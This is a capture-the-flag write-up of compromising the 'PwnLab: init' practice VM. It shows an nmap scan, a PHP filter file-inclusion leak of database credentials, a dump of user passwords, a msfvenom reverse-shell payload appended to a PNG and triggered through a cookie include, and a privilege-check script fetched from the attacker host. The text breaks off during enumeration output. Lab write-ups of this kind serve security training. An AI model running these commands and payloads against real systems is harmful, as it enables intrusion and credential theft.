PwnLab: init
Service discovery:
First, I fired up HaGashash in order to gain some information about which host to attack and what interesting services run there. (https://github.com/Gandosha/HaGashash).
[GandoPC ~]# go run go/src/github.com/Gandosha/HaGashash/main.go -project=PwnLab:init -subnet=true -interface=enp0s3 <-=|HaGashash by Gandosha|=-> [+] nmap executable is in '/usr/bin/nmap' [+] ifconfig executable is in '/usr/bin/ifconfig' [!] Dependencies check is completed successfully. [!] Starting to scan your subnet. [+] Alive hosts in 192.168.43.0/24 are: 192.168.43.1 192.168.43.2 192.168.43.4 192.168.43.3 [+] Directory created at: /HaGashash_Projects/PwnLab:init/192.168.43.1. [!] Starting to scan 192.168.43.1 for TCP interesting stuff. [!] Starting to scan 192.168.43.1 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/PwnLab:init/192.168.43.2. [!] Starting to scan 192.168.43.2 for TCP interesting stuff. [!] Starting to scan 192.168.43.2 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/PwnLab:init/192.168.43.4. [!] Starting to scan 192.168.43.4 for TCP interesting stuff. [!] Starting to scan 192.168.43.4 for UDP interesting stuff. [+] Directory created at: /HaGashash_Projects/PwnLab:init/192.168.43.3. [!] Starting to scan 192.168.43.3 for UDP interesting stuff. [!] Starting to scan 192.168.43.3 for TCP interesting stuff. [+] Nmap's TCP script scanning on 192.168.43.3 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.4 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.3 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.2 is completed successfully. [+] Nmap's TCP script scanning on 192.168.43.1 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.4 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.1 is completed successfully. [+] Nmap's UDP script scanning on 192.168.43.2 is completed successfully. [+] Summary file for 192.168.43.4 is ready. [+] Summary file for 192.168.43.1 is ready. [+] Summary file for 192.168.43.3 is ready. [+] Summary file for 192.168.43.2 is ready. [gandosha@GandoPC 192.168.43.4]$ cat nmap_TCP_scan_output # Nmap 7.70 scan initiated Thu Oct 4 18:07:34 2018 as: nmap -sS -p- -A -T4 -Pn -vv -oN /HaGashash_Projects/PwnLab:init/192.168.43.4/nmap_TCP_scan_output 192.168.43.4 mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers Nmap scan report for 192.168.43.4 Host is up, received arp-response (0.0022s latency). Scanned at 2018-10-04 18:07:35 IDT for 26s Not shown: 65531 closed ports Reason: 65531 resets PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) |_http-title: PwnLab Intranet Image Hosting 111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 43447/udp status |_ 100024 1 57126/tcp status 3306/tcp open mysql syn-ack ttl 64 MySQL 5.5.47-0+deb8u1 | mysql-info: | Protocol: 10 | Version: 5.5.47-0+deb8u1 | Thread ID: 38 | Capabilities flags: 63487 | Some Capabilities: Speaks41ProtocolOld, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, ODBCClient, FoundRows, IgnoreSigpipes, ConnectWithDatabase, InteractiveClient, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, IgnoreSpaceBeforeParenthesis, LongPassword, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments | Status: Autocommit | Salt: '+AExN[^F$!uNe2h5lER |_ Auth Plugin Name: 88 57126/tcp open status syn-ack ttl 64 1 (RPC #100024) MAC Address: 08:00:27:0D:33:06 (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 TCP/IP fingerprint: OS:SCAN(V=7.70%E=4%D=10/4%OT=80%CT=1%CU=%PV=Y%DS=1%DC=D%G=N%M=080027%TM=5BB OS:62CD1%P=x86_64-unknown-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%II=I OS:%TS=8)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O OS:5=M5B4ST11NW6%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%TG=40%W=7210%O=M5B4NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=% OS:RD=0%Q=)T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40 OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0% OS:Q=)U1(R=N)IE(R=Y%DFI=N%TG=40%CD=S) Uptime guess: 198.839 days (since Mon Mar 19 21:00:00 2018) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE HOP RTT ADDRESS 1 2.22 ms 192.168.43.4 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Oct 4 18:08:01 2018 -- 1 IP address (1 host up) scanned in 28.22 seconds
Port 80 check:
Attempt to access via http port 80.
I tried to spider and fuzz it in order to discover some content:
I found some interesting files, but i cant see what is inside config.php:
I did some research and i found this article: https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/. Next, i tried to perform this approach. It worked!
[gandosha@GandoPC 192.168.43.4]$ curl http://192.168.43.4/?page=php://filter/convert.base64-encode/resource=configPwnLab Intranet Image Hosting [gandosha@GandoPC 192.168.43.4]$ curl http://192.168.43.4/?page=php://filter/convert.base64-encode/resource=index
[ Home ] [ Login ] [ Upload ]
PD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+PwnLab Intranet Image Hosting [gandosha@GandoPC 192.168.43.4]$ curl http://192.168.43.4/?page=php://filter/convert.base64-encode/resource=upload
[ Home ] [ Login ] [ Upload ]
PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=PwnLab Intranet Image Hosting [gandosha@GandoPC 192.168.43.4]$ curl http://192.168.43.4/?page=php://filter/convert.base64-encode/resource=login
[ Home ] [ Login ] [ Upload ]
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==PwnLab Intranet Image Hosting
[ Home ] [ Login ] [ Upload ]
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==
Those pages revealed some base64 string. So, I decoded those strings to see if there is something there:
DB creds.
Login.php - not interesting.
index.php - uncommented cookie check and include.
upload.php - upload directory and what file extensions are in whitelist.
Using this crucial information i was able to understand how does the application work.
Port 3306 check:
Attempt to access the database (U:root,P:H4u%QJ_H99):
[gandosha@GandoPC 192.168.43.4]$ mysql -h 192.168.43.4 -u root -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 43 Server version: 5.5.47-0+deb8u1 (Debian) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | Users | +--------------------+ 2 rows in set (0.01 sec) MySQL [(none)]> use Users; Database changed MySQL [Users]> show tables; +-----------------+ | Tables_in_Users | +-----------------+ | users | +-----------------+ 1 row in set (0.01 sec) MySQL [Users]> select * from users; +------+------------------+ | user | pass | +------+------------------+ | kent | Sld6WHVCSkpOeQ== | | mike | U0lmZHNURW42SQ== | | kane | aVN2NVltMkdSbw== | +------+------------------+ 3 rows in set (0.00 sec) MySQL [Users]> quit Bye
User names and passwords in base64 were found.
I decoded those values and added them to my creds file:
[GandoPC 192.168.43.4]# echo 'kent Sld6WHVCSkpOeQ== JWzXuBJJNy' > creds [GandoPC 192.168.43.4]# echo 'mike U0lmZHNURW42SQ== SIfdsTEn6I' >> creds [GandoPC 192.168.43.4]# echo 'kane aVN2NVltMkdSbw== iSv5Ym2GRo' >> creds [GandoPC 192.168.43.4]# echo 'root H4u%QJ_H99' >> creds [GandoPC 192.168.43.4]# cat creds kent Sld6WHVCSkpOeQ== JWzXuBJJNy mike U0lmZHNURW42SQ== SIfdsTEn6I kane aVN2NVltMkdSbw== iSv5Ym2GRo root H4u%QJ_H99
Login and upload a malicious png:
Login using kent's creds:
After a successful login, i was redirected by the application to the upload page:
I downloaded pwnlab.png from /images directory and used it as the malicious png:
[GandoPC 192.168.43.4]# wget http://192.168.43.4/images/pwnlab.png --2018-10-04 19:32:55-- http://192.168.43.4/images/pwnlab.png Connecting to 192.168.43.4:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13027 (13K) [image/png] Saving to: ‘pwnlab.png’ pwnlab.png 100%[=====================================================================================================>] 12.72K --.-KB/s in 0.02s 2018-10-04 19:32:55 (696 KB/s) - ‘pwnlab.png’ saved [13027/13027] [GandoPC 192.168.43.4]# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.43.3 LPORT=4444 >> pwnlab.png [-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload [-] No arch selected, selecting arch: php from the payload No encoder or badchars specified, outputting raw payload Payload size: 30303 bytes
Listener setup:
[gandosha@GandoPC 192.168.43.4]$ msfconsole -x "use exploit/multi/handler;set LHOST 192.168.43.3;set LPORT 4444;set PAYLOAD php/meterpreter_reverse_tcp;run"
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v4.17.5-dev ]
+ -- --=[ 1800 exploits - 1021 auxiliary - 311 post ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
LHOST => 192.168.43.3
LPORT => 4444
PAYLOAD => php/meterpreter_reverse_tcp
[*] Started reverse TCP handler on 192.168.43.3:4444
Upload of the malicious png:
My .png file was uploaded successfully.
I thought that opening up the uploaded .png should get me a reverse meterpreter shell. But, it did not work. Something there did not execute:
Cookie manipulation and getting a reverse meterpreter shell:
I added a "lang" cookie to a crafted http get request using kent's valid PHPSESSID cookie:
Immediately i got a shell:
[*] Meterpreter session 1 opened (192.168.43.3:4444 -> 192.168.43.4:36635) at 2018-10-06 13:38:36 +0300
meterpreter > shell
Process 1124 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@pwnlab:/var/www/html$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:0d:33:06
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe0d:3306/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:327235 errors:127 dropped:0 overruns:0 frame:0
TX packets:366158 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64039551 (61.0 MiB) TX bytes:121308543 (115.6 MiB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:99 errors:0 dropped:0 overruns:0 frame:0
TX packets:99 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9744 (9.5 KiB) TX bytes:9744 (9.5 KiB)
Privilege Escalation:
I used linuxprivchecker.py in order to enumerate the target:
www-data@pwnlab:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@pwnlab:/var/www/html$ ls
ls
config.php images index.php login.php upload upload.php
www-data@pwnlab:/var/www/html$ cd upload
cd upload
www-data@pwnlab:/var/www/html/upload$ ls
ls
f8c3fc737f057212414e67a22be29837.png
www-data@pwnlab:/var/www/html/upload$ wget http://192.168.43.3/Tools/linuxprivchecker/linuxprivchecker.py
<.168.43.3/Tools/linuxprivchecker/linuxprivchecker.py
converted 'http://192.168.43.3/Tools/linuxprivchecker/linuxprivchecker.py' (ANSI_X3.4-1968) -> 'http://192.168.43.3/Tools/linuxprivchecker/linuxprivchecker.py' (UTF-8)
--2018-10-04 16:52:30-- http://192.168.43.3/Tools/linuxprivchecker/linuxprivchecker.py
Connecting to 192.168.43.3:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25304 (25K)
Saving to: 'linuxprivchecker.py'
linuxprivchecker.py 100%[=====================>] 24.71K --.-KB/s in 0s
2018-10-04 16:52:30 (557 MB/s) - 'linuxprivchecker.py' saved [25304/25304]
www-data@pwnlab:/var/www/html/upload$ chmod +x linuxprivchecker.py
chmod +x linuxprivchecker.py
www-data@pwnlab:/var/www/html/upload$ python ./linuxprivchecker.py
python ./linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 3.16.0-4-686-pae (debian-kernel@lists.debian.org) (gcc version 4.8.4 (Debian 4.8.4-1) ) #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29)
[+] Hostname
pwnlab
[+] Operating System
Debian GNU/Linux 8 \n \l
[*] GETTING NETWORKING INFO...
[+] Interfaces
eth0 Link encap:Ethernet HWaddr 08:00:27:0d:33:06
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe0d:3306/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:327260 errors:127 dropped:0 overruns:0 frame:0
TX packets:366178 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:64042021 (61.0 MiB) TX bytes:121314935 (115.6 MiB)
Interrupt:9 Base address:0xd000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:99 errors:0 dropped:0 overruns:0 frame:0
TX packets:99 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:9744 (9.5 KiB) TX bytes:9744 (9.5 KiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:57126 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 192.168.43.4:36632 192.168.43.3:4444 ESTABLISHED -
tcp 0 0 192.168.43.4:36635 192.168.43.3:4444 ESTABLISHED 1124/sh
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::50425 :::* LISTEN -
tcp6 0 0 192.168.43.4:80 192.168.43.3:45015 ESTABLISHED -
tcp6 0 0 192.168.43.4:80 192.168.43.3:60899 ESTABLISHED -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:941 0.0.0.0:* -
udp 0 0 0.0.0.0:10930 0.0.0.0:* -
udp 0 0 0.0.0.0:43447 0.0.0.0:* -
udp 0 0 127.0.0.1:968 0.0.0.0:* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::20347 :::* -
udp6 0 0 :::39820 :::* -
udp6 0 0 :::941 :::* -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
192.168.43.0 * 255.255.255.0 U 0 0 0 eth0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=62179,mode=755)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102412k,mode=755)
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro,data=ordered)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=23,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
mqueue on /dev/mqueue type mqueue (rw,relatime)
rpc_pipefs on /run/rpc_pipefs type rpc_pipefs (rw,relatime)
binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
[+] fstab entries
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
#
# / was on /dev/sda1 during installation
UUID=16b0f3af-7854-4ead-8185-6c248062701c / ext4 errors=remount-ro 0 1
# swap was on /dev/sda5 during installation
UUID=59d16917-774d-43d9-9324-829b365bcfbf none swap sw 0 0
/dev/sr0 /media/cdrom0 udf,iso9660 user,noauto 0 0
[+] Scheduled cron jobs
-rw-r--r-- 1 root root 722 Jun 7 2015 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
-rw-r--r-- 1 root root 661 Jan 15 2016 php5
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
-rwxr-xr-x 1 root root 625 Jan 2 2016 apache2
-rwxr-xr-x 1 root root 15000 Sep 18 2015 apt
-rwxr-xr-x 1 root root 314 Nov 8 2014 aptitude
-rwxr-xr-x 1 root root 355 Oct 17 2014 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 4125 Mar 13 2016 exim4-base
-rwxr-xr-x 1 root root 89 Nov 8 2014 logrotate
-rwxr-xr-x 1 root root 1293 Dec 31 2014 man-db
-rwxr-xr-x 1 root root 435 Jun 13 2013 mlocate
-rwxr-xr-x 1 root root 249 Nov 19 2015 passwd
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Mar 17 2016 .
drwxr-xr-x 85 root root 4096 Oct 4 13:55 ..
-rw-r--r-- 1 root root 102 Jun 7 2015 .placeholder
-rwxr-xr-x 1 root root 771 Dec 31 2014 man-db
[+] Writable cron dirs
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
16:49:00 up 2:42, 0 users, load average: 0.00, 0.01, 0.08
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
[+] Super Users Found:
root
[+] Environment
SHLVL=1
OLDPWD=/var/www/html
APACHE_RUN_DIR=/var/run/apache2
APACHE_PID_FILE=/var/run/apache2/apache2.pid
_=/usr/bin/python
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
APACHE_LOCK_DIR=/var/lock/apache2
LANG=C
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data
APACHE_LOG_DIR=/var/log/apache2
PWD=/var/www/html/upload
[+] Root and current user history (depends on privs)
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
